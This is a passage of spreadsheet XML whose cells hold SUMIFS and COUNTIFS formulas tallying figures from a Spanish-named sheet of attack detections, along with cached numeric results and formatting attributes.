      <c r="CX72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>0</v>
      </c>
      <c r="CY72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>48</v>
      </c>
      <c r="CZ72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>5</v>
      </c>
      <c r="DE72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>0</v>
      </c>
      <c r="DF72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>18</v>
      </c>
      <c r="DI72" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>0</v>
      </c>
      <c r="DJ72" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>1</v>
      </c>
      <c r="DK72" s="271"/>
      <c r="DO72" s="279"/>
      <c r="DP72" s="271"/>
      <c r="DQ72" s="271"/>
      <c r="DR72" s="271"/>
      <c r="DS72" s="271"/>
      <c r="DT72" s="271"/>
      <c r="DU72" s="271"/>
      <c r="DV72" s="271"/>
      <c r="DW72" s="271"/>
      <c r="DX72" s="271"/>
      <c r="DY72" s="271"/>
      <c r="DZ72" s="271"/>
      <c r="EA72" s="271"/>
      <c r="EB72" s="271"/>
      <c r="EC72" s="271"/>
      <c r="ED72" s="280"/>
      <c r="EG72" s="279"/>
      <c r="EH72" s="271"/>
      <c r="EI72" s="271"/>
      <c r="EJ72" s="271"/>
      <c r="EK72" s="271"/>
      <c r="EL72" s="271"/>
      <c r="EM72" s="271"/>
      <c r="EN72" s="271"/>
      <c r="EO72" s="271"/>
      <c r="EP72" s="478"/>
      <c r="EQ72" s="478"/>
      <c r="ER72" s="478"/>
      <c r="ES72" s="271"/>
      <c r="ET72" s="271"/>
      <c r="EU72" s="271"/>
      <c r="EV72" s="271"/>
      <c r="EW72" s="271"/>
      <c r="EX72" s="271"/>
      <c r="EY72" s="271"/>
      <c r="EZ72" s="271"/>
      <c r="FA72" s="280"/>
      <c r="FD72" s="480"/>
      <c r="FE72" s="480"/>
      <c r="FF72" s="480"/>
      <c r="FG72" s="480"/>
      <c r="FH72" s="480"/>
      <c r="FI72" s="480"/>
      <c r="FJ72" s="480"/>
      <c r="FK72" s="480"/>
      <c r="FL72" s="480"/>
      <c r="FM72" s="480"/>
      <c r="FN72" s="480"/>
      <c r="FO72" s="480"/>
      <c r="FP72" s="480"/>
      <c r="FQ72" s="480"/>
      <c r="FR72" s="480"/>
      <c r="FS72" s="480"/>
      <c r="FT72" s="480"/>
      <c r="FU72" s="480"/>
      <c r="FV72" s="480"/>
      <c r="FW72" s="480"/>
      <c r="FX72" s="480"/>
      <c r="FY72" s="379" t="s">
        <v>1373</v>
      </c>
      <c r="FZ72" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY55)+SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY55 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY55)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY55 &amp; "*"))</f>
        <v>0.3470256524</v>
      </c>
      <c r="GA72" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY55)+SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY55 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY55)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY55 &amp; "*"))</f>
        <v>0.3684210526</v>
      </c>
      <c r="GB72" s="480"/>
      <c r="GC72" s="379" t="s">
        <v>1373</v>
      </c>
      <c r="GD72" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY55)+SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY55 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY55)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY55 &amp; "*"))</f>
        <v>0.3471070309</v>
      </c>
      <c r="GE72" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY55)+SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY55 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY55)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY55 &amp; "*"))</f>
        <v>0.4210526316</v>
      </c>
      <c r="GF72" s="480"/>
      <c r="GG72" s="480"/>
      <c r="GH72" s="480"/>
      <c r="GI72" s="480"/>
      <c r="GJ72" s="480"/>
      <c r="GK72" s="480"/>
      <c r="GL72" s="480"/>
      <c r="GM72" s="480"/>
      <c r="GN72" s="480"/>
      <c r="GO72" s="480"/>
      <c r="GP72" s="480"/>
      <c r="GQ72" s="480"/>
      <c r="GR72" s="480"/>
      <c r="GS72" s="480"/>
      <c r="GT72" s="480"/>
      <c r="GU72" s="480"/>
      <c r="GV72" s="480"/>
      <c r="GW72" s="480"/>
      <c r="GX72" s="480"/>
      <c r="GY72" s="480"/>
      <c r="GZ72" s="480"/>
      <c r="HA72" s="480"/>
      <c r="HB72" s="480"/>
      <c r="HC72" s="480"/>
      <c r="HD72" s="480"/>
      <c r="HE72" s="480"/>
      <c r="HF72" s="480"/>
      <c r="HG72" s="480"/>
      <c r="HH72" s="480"/>
      <c r="HI72" s="480"/>
      <c r="HJ72" s="480"/>
      <c r="HK72" s="480"/>
      <c r="HL72" s="480"/>
      <c r="HM72" s="480"/>
      <c r="HN72" s="480"/>
      <c r="HO72" s="480"/>
      <c r="HP72" s="480"/>
    </row>
    <row r="73">
      <c r="J73" s="277"/>
      <c r="K73" s="434"/>
      <c r="L73" s="353"/>
      <c r="M73" s="353"/>
      <c r="N73" s="354"/>
      <c r="O73" s="278"/>
      <c r="Q73" s="271"/>
      <c r="R73" s="386" t="s">
        <v>2540</v>
      </c>
      <c r="S73" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>10066</v>
      </c>
      <c r="T73" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>9998</v>
      </c>
      <c r="U73" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>16</v>
      </c>
      <c r="V73" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>8</v>
      </c>
      <c r="W73" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X73" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="Y73" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>792</v>
      </c>
      <c r="Z73" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>7634</v>
      </c>
      <c r="AA73" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>25</v>
      </c>
      <c r="AB73" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>20</v>
      </c>
      <c r="AC73" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>24</v>
      </c>
      <c r="AD73" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>1773</v>
      </c>
      <c r="AE73" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>53</v>
      </c>
      <c r="AF73" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>19</v>
      </c>
      <c r="AG73" s="271"/>
      <c r="AH73" s="386" t="s">
        <v>2540</v>
      </c>
      <c r="AI73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>10064</v>
      </c>
      <c r="AJ73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>1</v>
      </c>
      <c r="AL73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>9998</v>
      </c>
      <c r="AN73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>3</v>
      </c>
      <c r="AR73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>4</v>
      </c>
      <c r="AS73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>3</v>
      </c>
      <c r="AU73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>4</v>
      </c>
      <c r="AV73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>2</v>
      </c>
      <c r="AW73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>8</v>
      </c>
      <c r="AY73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>0</v>
      </c>
      <c r="BA73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>0</v>
      </c>
      <c r="BB73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>1</v>
      </c>
      <c r="BD73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>0</v>
      </c>
      <c r="BF73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>792</v>
      </c>
      <c r="BI73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>0</v>
      </c>
      <c r="BL73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>0</v>
      </c>
      <c r="BM73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>658</v>
      </c>
      <c r="BN73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>6976</v>
      </c>
      <c r="BO73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>0</v>
      </c>
      <c r="BR73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>0</v>
      </c>
      <c r="BT73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>0</v>
      </c>
      <c r="BU73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>0</v>
      </c>
      <c r="BX73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>1</v>
      </c>
      <c r="BZ73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>20</v>
      </c>
      <c r="CA73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>0</v>
      </c>
      <c r="CC73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD73" s="355">
